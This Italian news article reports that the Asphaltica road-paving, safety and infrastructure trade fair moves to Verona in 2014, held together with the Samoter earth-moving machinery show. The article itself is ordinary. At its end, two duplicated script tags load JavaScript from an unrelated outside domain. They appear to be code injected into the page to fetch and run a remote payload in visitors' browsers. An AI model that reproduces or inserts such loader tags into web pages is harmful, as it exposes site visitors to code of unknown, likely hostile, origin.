1. Home
  2. Notizie e Mercato
  3. Asphaltica, il Salone delle soluzioni e tecnologie per pavimentazioni, sicurezza e infrastrutture stradali sbarca a Verona

Asphaltica, il Salone delle soluzioni e tecnologie per pavimentazioni, sicurezza e infrastrutture stradali sbarca a Verona

Urbanistica di
5/5
votato da 1 persone
Grazie all’accordo tra la Fiera di Verona e Siteb l’edizione del 2014 di Asphaltica si terrà a Verona in concomitanza con Samoter, il Salone Internazionale Macchine Movimento Terra


La Fiera di Verona ha siglato un importante accordo di collaborazione con Siteb, l’associazione italiana di riferimento per le opere stradali e le infrastrutture viarie, che unisce e aggrega circa 300 Associati (aziende di settore, P.A. e liberi professionisti) che si occupano di progettazione, costruzione, controllo e manutenzione stradale, tramite il quale dal 2014 Asphaltica, il salone delle soluzioni e tecnologie per pavimentazioni, sicurezza e infrastrutture stradali, si svolgerà a Verona.

La rassegna rappresenta il più importante appuntamento in Italia per gli operatori della viabilità stradale e riserva una grande attenzione alle tematiche della sicurezza stradale e della tutela ambientale.

L’Italia, con oltre 480 mila km di rete viaria extraurbana, è il secondo produttore di asfalto in Europa, settore nel quale sono impiegate circa 500mila persone, fra addetti dei comparti costruzioni, industria petrolifera, industria meccanica, chimica e servizi.

La prima edizione di Asphaltica a Verona è in programma dal 27 febbraio al 2 marzo 2014,in concomitanza con Samoter, Salone Internazionale triennale Macchine Movimento Terra da cantiere e per l'edilizia, che rappresenta il principale appuntamento per il comparto costruzioni riunendo i più importanti produttori e operatori mondiali del mercato dei macchinari ed impianti, istituzioni ed associazioni di categoria.

Questa collocazione in contemporanea, nasce con l’obbiettivo di qualificare Asphaltica quale punto di riferimento europeo per l’intera filiera, potendo contare sugli importanti numeri di Samoter e sulla sua ampia visibilità internazionale (nell’ultima edizione il salone è stato visitato da 100.000 operatori).

L’importante accordo tra Veronafiere e Siteb, garantisce ad Asphaltica di sviluppare nuove ed efficaci sinergie di crescita grazie al trackrecords da leader nell’organizzazione diretta di eventi fieristici di Veronafiere ed alla pluriennale collaborazione di Siteb nell’ambito del Samoter.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>